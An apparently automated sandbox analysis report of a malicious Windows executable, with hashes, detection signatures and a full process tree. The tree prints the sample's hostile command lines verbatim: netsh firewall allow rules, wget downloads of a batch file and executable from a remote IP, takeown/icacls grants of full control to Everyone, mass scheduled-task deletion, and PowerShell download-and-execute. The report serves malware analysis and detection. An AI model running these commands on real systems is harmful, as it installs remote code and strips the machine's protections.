Analysis
-
max time kernel
28s -
max time network
30s -
platform
windows7_x64 -
resource
win7-20221111-en -
resource tags
-
submitted
15-11-2022 12:43
General
-
Target
tmp.exe
-
Size
532KB
-
MD5
cba9caa64e418a546044daa8744800b3
-
SHA1
72060361b8a025ea3e132f6015cb20a87d3dff44
-
SHA256
9aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
-
SHA512
aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
-
SSDEEP
12288:u5m8ZlWk6VT6qIm9qCZb5rTa8kdVXpP1PIU/bB6h1a15:5O+DD9qCZb5rTa8UPPRP/bkar
Score
10/10
Malware Config
Extracted
Language
ps1
Deobfuscated
URLs
ps1.dropper
https://chocolatey.org/install.ps1
Signatures
-
Blocklisted process makes network request 2 IoCs
-
Downloads MZ/PE file
-
Executes dropped EXE 2 IoCs
-
Modifies Windows Firewall 1 TTPs 4 IoCs
-
Possible privilege escalation attempt 19 IoCs
-
UPX packed file 9 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Modifies file permissions 1 TTPs 19 IoCs
-
AutoIT Executable 3 IoCs
AutoIT scripts compiled to PE executables.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
-
Suspicious use of AdjustPrivilegeToken 5 IoCs
-
Suspicious use of FindShellTrayWindow 16 IoCs
-
Suspicious use of SendNotifyMessage 16 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\tmp.exe"C:\Users\Admin\AppData\Local\Temp\tmp.exe"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\Users\Admin\AppData\Local\Temp\tmp.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="upwget" dir=in action=allow program=%allusersprofile%\zem\wget.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="upwget" dir=in action=allow program=C:\ProgramData\zem\wget.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=%allusersprofile%\zem\time_cli.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="uptime_cli" dir=in action=allow program=C:\ProgramData\zem\time_cli.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c netsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=%allusersprofile%\zem\up2batdownload.exe enable=yes2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\netsh.exenetsh advfirewall firewall add rule name="up2batdownload" dir=in action=allow program=C:\ProgramData\zem\up2batdownload.exe enable=yes3⤵
- Modifies Windows Firewall
-
C:\ProgramData\zem\wget.exeC:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_up2bat64atstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="SABDUHNY_Admin" 84.240.25.78/openforschool/bat/update64.bat2⤵
- Executes dropped EXE
-
C:\ProgramData\zem\wget.exeC:\ProgramData\zem\wget.exe --tries=2 -o "%ALLUSERSPROFILE%\zem\log\not_in_right_dir_cmdhatstrtp.txt" -N -P "C:\ProgramData\zem" --user-agent="SABDUHNY_Admin" 84.240.25.78/openforschool/prg/cmdh.exe2⤵
- Executes dropped EXE
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem /D Y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:F /T2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /T /inheritance:r3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Everyone:(OI)(CI)F2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\log /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Everyone:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y2⤵
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\upd /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Everyone:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Everyone:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Everyone:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /T /inheritance:r2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /T /inheritance:r3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\log /D Y2⤵
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\log /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\log /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\log /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c takeown /R /f %programdata%\zem\upd /D Y2⤵
-
C:\Windows\system32\takeown.exetakeown /R /f C:\ProgramData\zem\upd /D Y3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:F /T2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Все:F /T3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ICACLS %ALLUSERSPROFILE%\zem\upd /grant Все:(OI)(CI)F2⤵
-
C:\Windows\system32\icacls.exeICACLS C:\ProgramData\zem\upd /grant Все:(OI)(CI)F3⤵
- Possible privilege escalation attempt
- Modifies file permissions
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player Updater" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Adobe Flash Player Updater" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Adobe Flash Player PPAPI Notifier" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1009" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "OneDrive Standalone Update Task-S-1-5-21-683023514-2547189882-1938190590-1011" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "User_Feed_Synchronization-{31CAA45B-2034-4501-B12A-BB56B5804873}" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "User_Feed_Synchronization-{95D3B369-FB41-4E58-8BBD-842C00C86AA9}" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentFallBack2016" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "Microsoft\Office\OfficeTelemetryAgentLogOn2016" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_uninstall_java" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_uninstall_java" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_java64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_java64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_firefox64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_firefox64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_vlc64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_vlc64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_foxitreader_latest" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_foxitreader_latest" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ax" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player_ax" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player_ppapi" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player_ppapi" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_install_flash_player" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_install_flash_player" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_7z64" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_7z64" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /delete /TN "test_n_run" /F2⤵
-
C:\Windows\system32\schtasks.exeschtasks /delete /TN "test_n_run" /F3⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c copy /Y /Z C:\Users\Admin\AppData\Local\Temp\tmp.exe %ALLUSERSPROFILE%\zem\up2batdownload.exe2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c @powershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1')) && SET PATH=%PATH%;%systemdrive%\chocolatey\bin2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy unrestricted -Command iex ((new-object net.webclient).DownloadString('https://chocolatey.org/install.ps1'))3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c powershell cinst powershell -y2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell cinst powershell -y3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c echo chocolatey >> %ALLUSERSPROFILE%\zem\log\not_in_right_dir_chocolatey.txt2⤵
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\zem\run.bat2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Set-ExecutionPolicy RemoteSigned -force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell C:\ProgramData\zem\start.ps13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell "Set-ExecutionPolicy Restricted -force"3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\ProgramData\zem\update64.bat2⤵
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\zem\run.batFilesize
4KB
MD5092b3d397b9c50e6f9574b815c399475
SHA1b6b14b70687e1e42012badb256d56df3b356b001
SHA25615dd0e2ef2f128a458f84d39ecf35a7e0953cc2ea2c2dd753b59218cab6245ea
SHA5126d495dba29a571bc5e4b9b2c4c3e940b80e912cf6eb937b0c81e0b6040dac6689d61b5245c00ed18bd3309553f93cf31c74d6a03afc480614fc41cab04c2c11d
-
C:\ProgramData\zem\start.ps1Filesize
3KB
MD5d4f9a10e7f13780b24f064f8579e0c94
SHA178042ae2db47b563027027af95a8b61726081457
SHA256955963d1f9e82407cfbde525777f06dc700f5f7eb71756fc384b78d2e0d47af1
SHA51289fcf0e298c362642317e66aa28032877a9b830c076e2eaf705e5e2e336326f9ae02a82c11a20a28073320ce8205775067b2ba35f2bc9f1bed2e9f3edbf3fec5
-
C:\ProgramData\zem\tmp.exeFilesize
532KB
MD5cba9caa64e418a546044daa8744800b3
SHA172060361b8a025ea3e132f6015cb20a87d3dff44
SHA2569aa8880ca3650ef28c7a1dd5869a4d720ca0f62bda8ada3fcd86226b6f20e123
SHA512aac883eb4a0d5718d64a592632d1270c3f7ab8b8e1555f0c0a940922bc325dc07dea44a09ea3da0a0e834a4b266f1d6eb20b54523811c5992abbfc9bc56e4129
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\ProgramData\zem\wget.exeFilesize
392KB
MD5bd126a7b59d5d1f97ba89a3e71425731
SHA1457b1cd985ed07baffd8c66ff40e9c1b6da93753
SHA256a48ad33695a44de887bba8f2f3174fd8fb01a46a19e3ec9078b0118647ccf599
SHA5123ef1b83ea9821cb10f8bc149ec481d1e486d246a0cb51fe7983785529df42c6fe775e0d35c64a97f997cdf294464c7640df392239b96ce1be6143ce8f07b5a8a
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD577ab86eb46014c6165a1e21d4becc830
SHA19730b0c3066a07aa1ff87f048d28857f1691cc50
SHA256dce3c4b4571dda98fe06bd866d140e40dcedf4e5e1784ac8a91e94c910e626cf
SHA512ad65af29e12fdb5660da0e9587fdf840d47e779431e35c2379db044e7e01cb4d770009f679f92c7087f9276e19509666b234a3e5e9b36d5e8aa65d2a8eb0d7da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD577ab86eb46014c6165a1e21d4becc830
SHA19730b0c3066a07aa1ff87f048d28857f1691cc50
SHA256dce3c4b4571dda98fe06bd866d140e40dcedf4e5e1784ac8a91e94c910e626cf
SHA512ad65af29e12fdb5660da0e9587fdf840d47e779431e35c2379db044e7e01cb4d770009f679f92c7087f9276e19509666b234a3e5e9b36d5e8aa65d2a8eb0d7da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD577ab86eb46014c6165a1e21d4becc830
SHA19730b0c3066a07aa1ff87f048d28857f1691cc50
SHA256dce3c4b4571dda98fe06bd866d140e40dcedf4e5e1784ac8a91e94c910e626cf
SHA512ad65af29e12fdb5660da0e9587fdf840d47e779431e35c2379db044e7e01cb4d770009f679f92c7087f9276e19509666b234a3e5e9b36d5e8aa65d2a8eb0d7da
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-msFilesize
7KB
MD577ab86eb46014c6165a1e21d4becc830
SHA19730b0c3066a07aa1ff87f048d28857f1691cc50
SHA256dce3c4b4571dda98fe06bd866d140e40dcedf4e5e1784ac8a91e94c910e626cf
SHA512ad65af29e12fdb5660da0e9587fdf840d47e779431e35c2379db044e7e01cb4d770009f679f92c7087f9276e19509666b234a3e5e9b36d5e8aa65d2a8eb0d7da
-
memory/240-94-0x0000000000000000-mapping.dmp
-
memory/280-65-0x0000000000000000-mapping.dmp
-
memory/288-125-0x0000000000000000-mapping.dmp
-
memory/320-86-0x0000000000000000-mapping.dmp
-
memory/368-131-0x000007FEF4020000-0x000007FEF4A43000-memory.dmpFilesize
10.1MB
-
memory/368-135-0x00000000029A4000-0x00000000029A7000-memory.dmpFilesize
12KB
-
memory/368-136-0x00000000029AB000-0x00000000029CA000-memory.dmpFilesize
124KB
-
memory/368-134-0x00000000029AB000-0x00000000029CA000-memory.dmpFilesize
124KB
-
memory/368-132-0x000007FEF34C0000-0x000007FEF401D000-memory.dmpFilesize
11.4MB
-
memory/368-133-0x00000000029A4000-0x00000000029A7000-memory.dmpFilesize
12KB
-
memory/368-84-0x0000000000000000-mapping.dmp
-
memory/524-128-0x0000000000000000-mapping.dmp
-
memory/524-107-0x0000000000000000-mapping.dmp
-
memory/572-129-0x0000000000000000-mapping.dmp
-
memory/572-58-0x0000000000000000-mapping.dmp
-
memory/584-109-0x0000000000000000-mapping.dmp
-
memory/592-82-0x0000000000000000-mapping.dmp
-
memory/628-142-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/628-139-0x000007FEF49C0000-0x000007FEF53E3000-memory.dmpFilesize
10.1MB
-
memory/628-144-0x000000000287B000-0x000000000289A000-memory.dmpFilesize
124KB
-
memory/628-143-0x0000000002874000-0x0000000002877000-memory.dmpFilesize
12KB
-
memory/628-140-0x000007FEF3E60000-0x000007FEF49BD000-memory.dmpFilesize
11.4MB
-
memory/672-102-0x0000000000000000-mapping.dmp
-
memory/688-100-0x0000000000000000-mapping.dmp
-
memory/696-89-0x0000000000000000-mapping.dmp
-
memory/768-121-0x0000000000000000-mapping.dmp
-
memory/772-106-0x0000000000000000-mapping.dmp
-
memory/836-116-0x0000000000000000-mapping.dmp
-
memory/840-88-0x0000000000000000-mapping.dmp
-
memory/872-79-0x0000000000000000-mapping.dmp
-
memory/896-127-0x0000000000000000-mapping.dmp
-
memory/952-99-0x0000000000000000-mapping.dmp
-
memory/960-81-0x0000000000000000-mapping.dmp
-
memory/960-123-0x0000000000000000-mapping.dmp
-
memory/964-122-0x0000000000000000-mapping.dmp
-
memory/1104-112-0x0000000000000000-mapping.dmp
-
memory/1140-113-0x0000000000000000-mapping.dmp
-
memory/1168-85-0x0000000000000000-mapping.dmp
-
memory/1276-59-0x0000000000000000-mapping.dmp
-
memory/1280-62-0x0000000000000000-mapping.dmp
-
memory/1280-110-0x0000000000000000-mapping.dmp
-
memory/1292-92-0x0000000000000000-mapping.dmp
-
memory/1316-93-0x0000000000000000-mapping.dmp
-
memory/1508-74-0x0000000000000000-mapping.dmp
-
memory/1532-165-0x000007FEF4020000-0x000007FEF4A43000-memory.dmpFilesize
10.1MB
-
memory/1532-167-0x0000000002714000-0x0000000002717000-memory.dmpFilesize
12KB
-
memory/1532-170-0x000000000271B000-0x000000000273A000-memory.dmpFilesize
124KB
-
memory/1532-169-0x0000000002714000-0x0000000002717000-memory.dmpFilesize
12KB
-
memory/1532-166-0x000007FEF34C0000-0x000007FEF401D000-memory.dmpFilesize
11.4MB
-
memory/1532-168-0x000000001B7B0000-0x000000001BAAF000-memory.dmpFilesize
3.0MB
-
memory/1544-108-0x0000000000000000-mapping.dmp
-
memory/1548-66-0x0000000000000000-mapping.dmp
-
memory/1592-91-0x0000000000000000-mapping.dmp
-
memory/1604-83-0x0000000000000000-mapping.dmp
-
memory/1612-105-0x0000000000000000-mapping.dmp
-
memory/1612-126-0x0000000000000000-mapping.dmp
-
memory/1620-111-0x0000000000000000-mapping.dmp
-
memory/1648-117-0x0000000000000000-mapping.dmp
-
memory/1656-151-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1656-75-0x0000000000000000-mapping.dmp
-
memory/1656-150-0x000007FEF34C0000-0x000007FEF401D000-memory.dmpFilesize
11.4MB
-
memory/1656-98-0x0000000000000000-mapping.dmp
-
memory/1656-153-0x00000000023EB000-0x000000000240A000-memory.dmpFilesize
124KB
-
memory/1656-152-0x00000000023E4000-0x00000000023E7000-memory.dmpFilesize
12KB
-
memory/1656-149-0x000007FEF4020000-0x000007FEF4A43000-memory.dmpFilesize
10.1MB
-
memory/1672-115-0x0000000000000000-mapping.dmp
-
memory/1688-90-0x0000000000000000-mapping.dmp
-
memory/1708-104-0x0000000000000000-mapping.dmp
-
memory/1712-80-0x0000000000000000-mapping.dmp
-
memory/1712-124-0x0000000000000000-mapping.dmp
-
memory/1712-103-0x0000000000000000-mapping.dmp
-
memory/1768-114-0x0000000000000000-mapping.dmp
-
memory/1780-87-0x0000000000000000-mapping.dmp
-
memory/1784-56-0x0000000000000000-mapping.dmp
-
memory/1820-55-0x0000000000000000-mapping.dmp
-
memory/1824-63-0x0000000000000000-mapping.dmp
-
memory/1868-71-0x0000000000000000-mapping.dmp
-
memory/1868-73-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/1868-119-0x0000000000000000-mapping.dmp
-
memory/1876-96-0x0000000000000000-mapping.dmp
-
memory/1928-68-0x0000000000000000-mapping.dmp
-
memory/1928-95-0x0000000000000000-mapping.dmp
-
memory/1928-70-0x0000000000400000-0x00000000004EF000-memory.dmpFilesize
956KB
-
memory/1944-146-0x000000013FD40000-0x000000013FE82000-memory.dmpFilesize
1.3MB
-
memory/1944-54-0x000007FEFC631000-0x000007FEFC633000-memory.dmpFilesize
8KB
-
memory/1944-141-0x000000013FD40000-0x000000013FE82000-memory.dmpFilesize
1.3MB
-
memory/1944-61-0x000000013FD40000-0x000000013FE82000-memory.dmpFilesize
1.3MB
-
memory/1984-120-0x0000000000000000-mapping.dmp
-
memory/1992-78-0x0000000000000000-mapping.dmp
-
memory/1992-101-0x0000000000000000-mapping.dmp
-
memory/2012-118-0x0000000000000000-mapping.dmp
-
memory/2024-97-0x0000000000000000-mapping.dmp
-
memory/2036-161-0x00000000027D4000-0x00000000027D7000-memory.dmpFilesize
12KB
-
memory/2036-162-0x00000000027DB000-0x00000000027FA000-memory.dmpFilesize
124KB
-
memory/2036-159-0x000000001B700000-0x000000001B9FF000-memory.dmpFilesize
3.0MB
-
memory/2036-158-0x00000000027D4000-0x00000000027D7000-memory.dmpFilesize
12KB
-
memory/2036-157-0x000007FEF3E60000-0x000007FEF49BD000-memory.dmpFilesize
11.4MB
-
memory/2036-156-0x000007FEF49C0000-0x000007FEF53E3000-memory.dmpFilesize
10.1MB